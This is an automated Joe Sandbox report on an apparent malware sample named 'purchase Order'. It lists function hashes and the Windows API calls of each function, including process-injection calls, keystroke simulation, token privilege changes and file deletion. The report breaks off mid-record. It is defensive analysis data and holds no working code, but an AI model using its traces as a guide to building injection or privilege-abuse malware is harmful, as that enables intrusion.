                                                        • Instruction ID: 6d00d2b10b52eeb54c66e7608dc9f4c6286b8e17e56c31a1b04f9a73a203d9a6
                                                        • Opcode Fuzzy Hash: 3cac8c6a2425ac8fdd59d15cbe8e6ba852722e9b6d7f87c8c9406b05afaa4aac
                                                        • Instruction Fuzzy Hash: 71F0B471901644AAD731BB69C88676EBAA07F40734F258218F421AB2D1CB7CCB01BB95
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 017CC8B3
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017CC949
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017CC96B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                        • Instruction ID: 08816f3c9f658732d75e774d79459d3de6ca33eede426ab558c716461c301c58
                                                        • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                        • Instruction Fuzzy Hash: 4212CC24E24658C6EB24DF64D8507DEB232EF68700F1090ED910DEB7A5E77A4F81CB5A
                                                        APIs
                                                        • __flush.LIBCMT ref: 00C62A0B
                                                          • Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __flush__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 4101623367-0
                                                        • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                        • Instruction ID: b150d7c57ecb4f1d1c41054e5b082d575af0cde109452846a5665a06d2475448
                                                        • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                        • Instruction Fuzzy Hash: A9418671700F069FDB388EA9C8C15AE77A6EF84360B24853DE865C7285D6B4DE41AB40
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: ec5f98eaaf87736565ed84690982746aa4380abd89ee2cfa2e60d15b78105e83
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: F9310578A00105DBC718DF19C480A69FBB2FF59341B6486A5E819CB256DB30EFC5CF84
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: 8a5eecab0e0eade9622ad4d2b617e3de1f355d2fb6368f4793e174e3f97f1a21
                                                        • Instruction ID: 71ff4d9d069a5be9fe73dc4a22eea14bd1f61387a803ca901a1579e8d437668f
                                                        • Opcode Fuzzy Hash: 8a5eecab0e0eade9622ad4d2b617e3de1f355d2fb6368f4793e174e3f97f1a21
                                                        • Instruction Fuzzy Hash: 0331C079604529DFCB01AF01C0806AE7BB0FF4A364F20844AEA961B386EB70A945DF85
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 27be64c3d89293424a5bf371b888274eae54ee574e778dddd6886fdd72f3d041
                                                        • Instruction ID: c02469b6d61d4cea31aad8505ad0600141c4b3a2ee97ee9b2ef780510e0ef44d
                                                        • Opcode Fuzzy Hash: 27be64c3d89293424a5bf371b888274eae54ee574e778dddd6886fdd72f3d041
                                                        • Instruction Fuzzy Hash: 53415F745046118FDB24CF15C444B1ABBF0BF45305F29896CE9A64B362D372F88ADF56
                                                        APIs
                                                          • Part of subcall function 00C44214: FreeLibrary.KERNEL32(00000000,?), ref: 00C44247
                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C439FE,?,00000001), ref: 00C441DB
                                                          • Part of subcall function 00C44291: FreeLibrary.KERNEL32(00000000), ref: 00C442C4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Library$Free$Load
                                                        • String ID:
                                                        • API String ID: 2391024519-0
                                                        • Opcode ID: 0aded7f5263bae69bd16d8195da98cbff14668505ef3f0fb6536ba256d91a067
                                                        • Instruction ID: 8b283c68807e327daa50180208fb1ef4a487978e516608b91ff63e03928f1dc3
                                                        • Opcode Fuzzy Hash: 0aded7f5263bae69bd16d8195da98cbff14668505ef3f0fb6536ba256d91a067
                                                        • Instruction Fuzzy Hash: 7811A731700305AADB28BF74DC06FAE77A9AF40711F208429F596A71C1DEB0DA01AB60
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: aae58b7fa131a5bdc047be7c19c7c0b9ce574914e186ebea0ba711dd47149658
                                                        • Instruction ID: ff59c71b7c3db4571c4695e98d5dd4b34d5289367070eeaa43cc2e2fc61e866e
                                                        • Opcode Fuzzy Hash: aae58b7fa131a5bdc047be7c19c7c0b9ce574914e186ebea0ba711dd47149658
                                                        • Instruction Fuzzy Hash: 18216974508601CFDB24DF64C444B1ABBF1BF85305F25496CEAAA87222D731F88ADF56
                                                        APIs
                                                        • ___lock_fhandle.LIBCMT ref: 00C6AFC0
                                                          • Part of subcall function 00C67BDA: __getptd_noexit.LIBCMT ref: 00C67BDA
                                                          • Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                        • String ID:
                                                        • API String ID: 1144279405-0
                                                        • Opcode ID: 00e87dd9d030e925fff851a99c767c483d4b7cf52c35dab6daac6e3349dad926
                                                        • Instruction ID: 52e4e4e84bf6ab534389aa7bbfc6223f2050d992c3fd152c0cf7b824b1d11e81
                                                        • Opcode Fuzzy Hash: 00e87dd9d030e925fff851a99c767c483d4b7cf52c35dab6daac6e3349dad926
                                                        • Instruction Fuzzy Hash: 8911C4B28056009FD7327FA4D8C57697FA0AF81335F294740E5349F1E2C7B58D40ABA2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                        • Instruction ID: f7d254faf067a59d7f7a4c9317a8116a8f6b1804191f3b2ac557c89879c5e14e
                                                        • Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                        • Instruction Fuzzy Hash: AA013131500109AECF15EFA4C8928FEBB74BF21344F148029F566A71A5EA309B49EB60
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 00C62AED
                                                          • Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2597487223-0
                                                        • Opcode ID: cafe9fd284856a88727a401a456ec64fa463bb807d3e2ca2274d30acd1808b2b
                                                        • Instruction ID: 6f07aa9b6555713ee6110ca26ce597c63590fdfa010e6849440908d09b78a869
                                                        • Opcode Fuzzy Hash: cafe9fd284856a88727a401a456ec64fa463bb807d3e2ca2274d30acd1808b2b
                                                        • Instruction Fuzzy Hash: 0EF0F031900609EBDF32AFB48C8639F3AA1BF40320F148415F4209B192C7B98A22FB81
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00C439FE,?,00000001), ref: 00C44286
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: 2be3e73272bfb7cf669e6149f5336046bbcc32b053d30b87df34b43b3c339879
                                                        • Instruction ID: bec96efa06d9e4149cab676bb5f300b9594a4c8f0fe0787c777814614440ac3f
                                                        • Opcode Fuzzy Hash: 2be3e73272bfb7cf669e6149f5336046bbcc32b053d30b87df34b43b3c339879
                                                        • Instruction Fuzzy Hash: F6F01571909702CFCB389F65D890A16BBE4BF043253248A3EF1E682611C7B29A80DB50
                                                        APIs
                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C440C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath
                                                        • String ID:
                                                        • API String ID: 82841172-0
                                                        • Opcode ID: dc0e1824f15b06cf328402f1a63f5b3b450ce126e9786d89ad67794126a44b63
                                                        • Instruction ID: c689f7bfc3a44ed2309f583c1664df82f55a5acb0ffe266911e2df433c1acf38
                                                        • Opcode Fuzzy Hash: dc0e1824f15b06cf328402f1a63f5b3b450ce126e9786d89ad67794126a44b63
                                                        • Instruction Fuzzy Hash: DDE0CD365002245BC7119654DC46FEE779DDF8D6A0F0900B5F905D7244DA6499819691
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 017CD109
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: 4c95db64fb3a79f4f5721990bf38fc815fab266a2bf1d555c2b135a4843038ad
                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction Fuzzy Hash: 30E0E67494010DDFDB00DFF4D54969D7BF4EF04701F100165FD01D2281D6319D508A62
                                                        APIs
                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00CAB1CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: %d/%02d/%02d$@U=u
                                                        • API String ID: 3850602802-2764005415
                                                        • Opcode ID: 763d1a7f73f0b0e8f39e26d92dbf56d2577a79d1f104b8d41112650ebf1ea577
                                                        • Instruction ID: 7d8110da8a96d28b0703ed621ac33bf1b3490baf3923e01c0e7481eace84ae8d
                                                        • Opcode Fuzzy Hash: 763d1a7f73f0b0e8f39e26d92dbf56d2577a79d1f104b8d41112650ebf1ea577
                                                        • Instruction Fuzzy Hash: 2E12C17150021AAFEB259F65CC49FAE7BB8FF46718F104129FA16DB2D1DB708A41CB11
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 00C5EB4A
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CB3AEA
                                                        • IsIconic.USER32(000000FF), ref: 00CB3AF3
                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00CB3B00
                                                        • SetForegroundWindow.USER32(000000FF), ref: 00CB3B0A
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CB3B20
                                                        • GetCurrentThreadId.KERNEL32 ref: 00CB3B27
                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00CB3B33
                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00CB3B44
                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00CB3B4C
                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00CB3B54
                                                        • SetForegroundWindow.USER32(000000FF), ref: 00CB3B57
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CB3B6C
                                                        • keybd_event.USER32(00000012,00000000), ref: 00CB3B77
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CB3B81
                                                        • keybd_event.USER32(00000012,00000000), ref: 00CB3B86
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CB3B8F
                                                        • keybd_event.USER32(00000012,00000000), ref: 00CB3B94
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CB3B9E
                                                        • keybd_event.USER32(00000012,00000000), ref: 00CB3BA3
                                                        • SetForegroundWindow.USER32(000000FF), ref: 00CB3BA6
                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00CB3BCD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: 483c63d0952e297d8d8866631278b53824d49c24844033028d8413fcbfb2ab01
                                                        • Instruction ID: 5f2950efdc63e530408cca2ff0ceea042ad1b4c68eb17384a4c5c0441bc0cfae
                                                        • Opcode Fuzzy Hash: 483c63d0952e297d8d8866631278b53824d49c24844033028d8413fcbfb2ab01
                                                        • Instruction Fuzzy Hash: 1A3167B1A403187BEB215FA5DC49FBF7E6CEB84B50F114026FA05EA1D1D6B15E01EAA0
                                                        APIs
                                                          • Part of subcall function 00C7B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7B180
                                                          • Part of subcall function 00C7B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C7B1AD
                                                          • Part of subcall function 00C7B134: GetLastError.KERNEL32 ref: 00C7B1BA
                                                        • _memset.LIBCMT ref: 00C7AD08
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C7AD5A
                                                        • CloseHandle.KERNEL32(?), ref: 00C7AD6B
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C7AD82
                                                        • GetProcessWindowStation.USER32 ref: 00C7AD9B
                                                        • SetProcessWindowStation.USER32(00000000), ref: 00C7ADA5
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C7ADBF
                                                          • Part of subcall function 00C7AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C7ACC0), ref: 00C7AB99
                                                          • Part of subcall function 00C7AB84: CloseHandle.KERNEL32(?,?,00C7ACC0), ref: 00C7ABAB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                        • String ID: $default$winsta0
                                                        • API String ID: 2063423040-1027155976
                                                        • Opcode ID: 109a14e4a9c97c597c7a9c9ab1ce48705da66d7af7d332f24dfb694772cc7a62
                                                        • Instruction ID: 1b38fb63cb361e6c0b21fd547f92ab5a4fa22d46f40025de285a6652d57e4e97
                                                        • Opcode Fuzzy Hash: 109a14e4a9c97c597c7a9c9ab1ce48705da66d7af7d332f24dfb694772cc7a62
                                                        • Instruction Fuzzy Hash: 28817B71900209AFDF119FA4CC49EEEBBB9EF48304F148129F929A61A1D7318E55DB62
                                                        APIs
                                                          • Part of subcall function 00C86EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C85FA6,?), ref: 00C86ED8
                                                          • Part of subcall function 00C86EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C85FA6,?), ref: 00C86EF1
                                                          • Part of subcall function 00C8725E: __wsplitpath.LIBCMT ref: 00C8727B
                                                          • Part of subcall function 00C8725E: __wsplitpath.LIBCMT ref: 00C8728E
                                                          • Part of subcall function 00C872CB: GetFileAttributesW.KERNEL32(?,00C86019), ref: 00C872CC
                                                        • _wcscat.LIBCMT ref: 00C86149
                                                        • _wcscat.LIBCMT ref: 00C86167
                                                        • __wsplitpath.LIBCMT ref: 00C8618E
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C861A4
                                                        • _wcscpy.LIBCMT ref: 00C86209
                                                        • _wcscat.LIBCMT ref: 00C8621C
                                                        • _wcscat.LIBCMT ref: 00C8622F
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00C8625D
                                                        • DeleteFileW.KERNEL32(?), ref: 00C8626E
                                                        • MoveFileW.KERNEL32(?,?), ref: 00C86289
                                                        • MoveFileW.KERNEL32(?,?), ref: 00C86298
                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00C862AD
                                                        • DeleteFileW.KERNEL32(?), ref: 00C862BE
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C862E1
                                                        • FindClose.KERNEL32(00000000), ref: 00C862FD
                                                        • FindClose.KERNEL32(00000000), ref: 00C8630B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 1917200108-1173974218
                                                        • Opcode ID: a5fcfe5efa608a8aaaf8d9c638410a963cd2be9302ab42de2733b8a9b02ee9ed
                                                        • Instruction ID: d3a2fe3bb73ca1a3835be50420929c1d6686930d81c4c7aa49f62c549bb30bf7
